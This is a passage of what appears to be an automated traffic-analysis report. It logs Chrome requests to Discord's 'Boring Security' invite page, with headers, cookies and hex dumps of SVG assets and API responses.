                                                                          Data Ascii: HTTP/1.1 400 Bad RequestDate: Sun, 10 Dec 2023 16:45:24 GMTContent-Type: text/plain; charset=utf-8Content-Length: 12Connection: closeAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Origin: *Sec-Websocket-Version: 13X-Conten
                                                                          2023-12-10 16:45:24 UTC12INData Raw: 42 61 64 20 52 65 71 75 65 73 74 0a
                                                                          Data Ascii: Bad Request


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          363192.168.2.550099162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:24 UTC1036OUTGET /assets/a826e445dff97cf15335.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=0t.4xUOg5ozt2pJJjJCIRtpRzcxSLuPznPL9LgCsw_A-1702226723898-0-604800000
                                                                          2023-12-10 16:45:24 UTC961INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 30 35 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 33 65 61 66 62 32 38 38 34 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:24 GMTContent-Type: image/svg+xmlContent-Length: 2058Connection: closeCF-Ray: 8336f543eafb2884-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-C
                                                                          2023-12-10 16:45:24 UTC408INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 35 20 34 35 22 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 0a 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 61 22 20 63 6c 69 70 50 61 74 68 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 30 20 33 36 68 33 36 56 30 48 30 76 33 36 5a 22 2f 3e 0a 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 3c 6d 61 73 6b 20 69 64 3d 22 62 22 3e 0a 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 20 78 3d 22 30 22 20 79 3d 22 30 22 20 77 69 64 74 68 3d
                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 45 45" xml:space="preserve"> <defs> <clipPath id="a" clipPathUnits="userSpaceOnUse"> <path d="M0 36h36V0H0v36Z"/> </clipPath> <mask id="b"> <g> <rect x="0" y="0" width=
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 3c 2f 6d 61 73 6b 3e 0a 20 20 3c 2f 64 65 66 73 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 3c 67 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 61 29 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 31 2e 32 35 20 30 20 30 20 2d 31 2e 32 35 20 30 20 34 35 29 22 20 6d 61 73 6b 3d 22 75 72 6c 28 23 62 29 22 3e 0a 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 32 2e 37 35 20 31 38 2e 32 35 63 31 2e 32 32 36 2d 32 2e 31 39 35 20 31 2e 38 35 35 20 31 2e 33 36 31 20 39 2e 33 31 33 20 32 2e 36 32 35 20 37 2e 34 35 37 20 31 2e 32 36 34 20 31 33 2e 37 32 38 2d 34 2e 34 35 34 20 31 33 2e 38 35 39 2d 35 2e 34 31 33 43 33 36 2e 30 35 33 20 31 34 2e 35 30 34 20 33 31 2e 34 37 34
                                                                          Data Ascii: </mask> </defs> <g> <g> <g clip-path="url(#a)" transform="matrix(1.25 0 0 -1.25 0 45)" mask="url(#b)"> <g> <path d="M12.75 18.25c1.226-2.195 1.855 1.361 9.313 2.625 7.457 1.264 13.728-4.454 13.859-5.413C36.053 14.504 31.474
                                                                          2023-12-10 16:45:24 UTC281INData Raw: 2e 35 32 38 2d 33 2e 31 34 20 32 2e 37 34 34 22 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 32 2e 35 30 32 20 31 39 2e 33 37 35 63 2e 30 34 34 2d 2e 36 32 35 2e 35 30 36 2d 31 2e 35 31 31 2e 35 30 36 2d 31 2e 35 31 31 2d 31 2e 30 31 36 2d 31 2e 34 37 33 2d 35 2e 36 34 33 2d 33 2e 30 31 36 2d 37 2e 33 35 34 2d 32 2e 39 32 39 2e 30 39 36 2e 36 32 37 2e 32 38 33 20 31 2e 33 36 32 2e 36 32 37 20 32 2e 30 39 36 20 31 2e 38 34 34 2e 34 37 31 20 34 2e 36 36 20 31 2e 30 37 31 20 36 2e 32 32 31 20 32 2e 33 34 34 22 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 3c 2f
                                                                          Data Ascii: .528-3.14 2.744" fill="white"/> </g> <g> <path d="M12.502 19.375c.044-.625.506-1.511.506-1.511-1.016-1.473-5.643-3.016-7.354-2.929.096.627.283 1.362.627 2.096 1.844.471 4.66 1.071 6.221 2.344" fill="white"/> </g> </


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          364192.168.2.550100162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:24 UTC1036OUTGET /assets/1f3e315f020ed5635dc1.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=1f025rEmS7Dx6uNbVlMg2z8U3BqF2p9yKs9d2xZaDyk-1702226723931-0-604800000
                                                                          2023-12-10 16:45:24 UTC1109INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 34 30 62 31 32 30 39 65 61 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:24 GMTContent-Type: image/svg+xmlContent-Length: 180Connection: closeCF-Ray: 8336f5440b1209ea-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Co
                                                                          2023-12-10 16:45:24 UTC180INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 39 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 20 39 22 20 77 69 64 74 68 3d 22 36 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 30 20 32 2e 38 33 39 31 32 76 33 2e 33 32 31 37 36 6c 33 20 32 2e 38 33 39 31 32 20 33 2d 32 2e 38 33 39 31 32 76 2d 33 2e 33 32 31 37 36 6c 2d 33 2d 32 2e 38 33 39 31 32 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e
                                                                          Data Ascii: <svg fill="none" height="9" viewBox="0 0 6 9" width="6" xmlns="http://www.w3.org/2000/svg"><path d="m0 2.83912v3.32176l3 2.83912 3-2.83912v-3.32176l-3-2.83912z" fill="#fff"/></svg>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          365192.168.2.550101162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:24 UTC1036OUTGET /assets/1af9bdf041e000508e41.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=6RuDu4mp_POUyrmMrOVpEny.UdK_gp.iChTAdPSizpE-1702226723991-0-604800000
                                                                          2023-12-10 16:45:24 UTC1111INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 36 61 61 62 36 37 34 33 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:24 GMTContent-Type: image/svg+xmlContent-Length: 137Connection: closeCF-Ray: 8336f546aab67431-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Co
                                                                          2023-12-10 16:45:24 UTC137INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 20 77 69 64 74 68 3d 22 31 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 35 20 32 68 32 76 38 68 2d 32 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e
                                                                          Data Ascii: <svg fill="none" height="12" viewBox="0 0 12 12" width="12" xmlns="http://www.w3.org/2000/svg"><path d="m5 2h2v8h-2z" fill="#fff"/></svg>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          366192.168.2.550102162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:24 UTC1789OUTPOST /api/v9/science HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 373
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                          X-Fingerprint: 1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was
                                                                          X-Debug-Options: bugReporterEnabled
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          X-Discord-Timezone: Europe/Zurich
                                                                          Content-Type: application/json
                                                                          X-Discord-Locale: en-US
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://discord.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=uymERFs01dlt38UGn5iqWw3JHnSCmXqgawSYEADAVao-1702226724003-0-604800000
                                                                          2023-12-10 16:45:24 UTC373OUTData Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 69 6e 76 69 74 65 5f 76 69 65 77 65 64 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 63 6c 69 65 6e 74 5f 74 72 61 63 6b 5f 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 30 32 32 32 36 37 32 33 33 33 35 2c 22 69 6e 76 69 74 65 5f 63 6f 64 65 22 3a 22 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 22 2c 22 63 6c 69 65 6e 74 5f 70 65 72 66 6f 72 6d 61 6e 63 65 5f 6d 65 6d 6f 72 79 22 3a 30 2c 22 61 63 63 65 73 73 69 62 69 6c 69 74 79 5f 66 65 61 74 75 72 65 73 22 3a 31 32 38 2c 22 72 65 6e 64 65 72 65 64 5f 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 2c 22 75 70 74 69 6d 65 5f 61 70 70 22 3a 31 38 2c 22 63 6c 69 65 6e 74 5f 72 74 63 5f 73 74 61 74 65 22 3a 22 44 49 53 43 4f 4e 4e 45 43 54 45 44 22 2c 22
                                                                          Data Ascii: {"events":[{"type":"invite_viewed","properties":{"client_track_timestamp":1702226723335,"invite_code":"boringsecurity","client_performance_memory":0,"accessibility_features":128,"rendered_locale":"en-US","uptime_app":18,"client_rtc_state":"DISCONNECTED","
                                                                          2023-12-10 16:45:24 UTC978INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 76 61 72 79 3a 20 4f 72 69 67 69 6e 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a
                                                                          Data Ascii: HTTP/1.1 204 No ContentDate: Sun, 10 Dec 2023 16:45:24 GMTConnection: closeaccess-control-allow-origin: https://discord.comvary: Origin, Access-Control-Request-Method, Access-Control-Request-HeadersVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          367192.168.2.550104162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:24 UTC1759OUTGET /api/v9/invites/boringsecurity?with_counts=true&with_expiration=true HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                          X-Fingerprint: 1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was
                                                                          X-Debug-Options: bugReporterEnabled
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          X-Discord-Timezone: Europe/Zurich
                                                                          X-Discord-Locale: en-US
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=uymERFs01dlt38UGn5iqWw3JHnSCmXqgawSYEADAVao-1702226724003-0-604800000
                                                                          2023-12-10 16:45:25 UTC771INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 35 38 38 35 61 37 34 38 35 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 3b 20 70 72
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:25 GMTContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeCF-Ray: 8336f545885a7485-MIACF-Cache-Status: DYNAMICStrict-Transport-Security: max-age=31536000; includeSubDomains; pr
                                                                          2023-12-10 16:45:25 UTC598INData Raw: 33 64 61 0d 0a 7b 22 74 79 70 65 22 3a 30 2c 22 63 6f 64 65 22 3a 22 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 22 2c 22 65 78 70 69 72 65 73 5f 61 74 22 3a 6e 75 6c 6c 2c 22 66 6c 61 67 73 22 3a 32 2c 22 67 75 69 6c 64 22 3a 7b 22 69 64 22 3a 22 39 33 33 32 35 33 33 32 38 37 39 34 36 38 39 35 34 36 22 2c 22 6e 61 6d 65 22 3a 22 42 6f 72 69 6e 67 20 53 65 63 75 72 69 74 79 22 2c 22 73 70 6c 61 73 68 22 3a 6e 75 6c 6c 2c 22 62 61 6e 6e 65 72 22 3a 6e 75 6c 6c 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 69 63 6f 6e 22 3a 22 39 62 30 61 64 31 61 37 61 32 63 39 31 31 36 38 34 61 30 65 37 65 36 65 31 65 37 62 63 65 32 65 22 2c 22 66 65 61 74 75 72 65 73 22 3a 5b 22 47 55 49 4c 44 5f 4f 4e 42 4f 41 52 44 49 4e 47 22 2c 22 52 4f 4c 45 5f 49 43
                                                                          Data Ascii: 3da{"type":0,"code":"boringsecurity","expires_at":null,"flags":2,"guild":{"id":"933253328794689546","name":"Boring Security","splash":null,"banner":null,"description":null,"icon":"9b0ad1a7a2c911684a0e7e6e1e7bce2e","features":["GUILD_ONBOARDING","ROLE_IC
                                                                          2023-12-10 16:45:25 UTC395INData Raw: 41 54 45 44 5f 49 43 4f 4e 22 2c 22 57 45 4c 43 4f 4d 45 5f 53 43 52 45 45 4e 5f 45 4e 41 42 4c 45 44 22 2c 22 54 48 52 45 45 5f 44 41 59 5f 54 48 52 45 41 44 5f 41 52 43 48 49 56 45 22 2c 22 41 55 54 4f 5f 4d 4f 44 45 52 41 54 49 4f 4e 22 5d 2c 22 76 65 72 69 66 69 63 61 74 69 6f 6e 5f 6c 65 76 65 6c 22 3a 32 2c 22 76 61 6e 69 74 79 5f 75 72 6c 5f 63 6f 64 65 22 3a 22 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 22 2c 22 6e 73 66 77 5f 6c 65 76 65 6c 22 3a 30 2c 22 6e 73 66 77 22 3a 66 61 6c 73 65 2c 22 70 72 65 6d 69 75 6d 5f 73 75 62 73 63 72 69 70 74 69 6f 6e 5f 63 6f 75 6e 74 22 3a 32 34 7d 2c 22 67 75 69 6c 64 5f 69 64 22 3a 22 39 33 33 32 35 33 33 32 38 37 39 34 36 38 39 35 34 36 22 2c 22 63 68 61 6e 6e 65 6c 22 3a 7b 22 69 64 22 3a 22 39 33 33 32 35
